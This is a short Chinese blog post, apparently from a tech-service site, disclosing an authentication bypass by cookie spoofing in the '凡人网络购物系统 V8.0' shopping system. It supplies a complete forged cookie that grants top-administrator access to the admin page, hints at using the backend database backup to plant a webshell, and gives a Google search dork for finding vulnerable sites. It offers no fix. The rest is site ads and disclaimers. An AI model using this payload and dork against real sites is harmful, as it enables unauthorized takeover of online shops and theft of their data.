凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

[重要通告]如您遇疑难杂症,本站支持知识付费业务,扫右边二维码加博主微信,可节省您宝贵时间哦!

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

当admin_class=0的时候就是总管理员身份了。伪造cookie如下 Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin 然后访问http://www.XXXX.com/ad_manage.asp即可,后台有数据库备份可以拿webshell。 inurl:"views.asp?hw_id="#google

ad_chk.asp判断管理员登陆状态 判断admin_class C:\Inetpub\wwwroot>findstr /i /n /s "admin_class" *.asp ad_admin.asp:29: rs("admin_class")=request("class1") ad_admin.asp:43:rs("admin_class")=request("class") ad_admin.asp:92:>总管理员 ad_admin.asp:93:>产品管理 ad_admin.asp:94:>订单管理

问题未解决?付费解决问题加Q或微信 2589053300 (即Q号又微信号)右上方扫一扫可加博主微信

所写所说,是心之所感,思之所悟,行之所得;文当无敷衍,落笔求简洁。 以所舍,求所获;有所依,方所成!

支付宝赞助
微信赞助

免责声明,若由于商用引起版权纠纷,一切责任均由使用者承担。

您必须遵守我们的协议,如您下载该资源,行为将被视为对《免责声明》全部内容的认可->联系老梁投诉资源
LaoLiang.Net部分资源来自互联网收集,仅供用于学习和交流,请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除。 敬请谅解! 侵权删帖/违法举报/投稿等事物联系邮箱:service@laoliang.net
意在交流学习,欢迎赞赏评论,如有谬误,请联系指正;转载请注明出处: » 凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

发表回复

本站承接,网站推广(SEM,SEO);软件安装与调试;服务器或网络推荐及配置;APP开发与维护;网站开发修改及维护; 各财务软件安装调试及注册服务(金蝶,用友,管家婆,速达,星宇等);同时也有客户管理系统,人力资源,超市POS,医药管理等;

立即查看 了解详情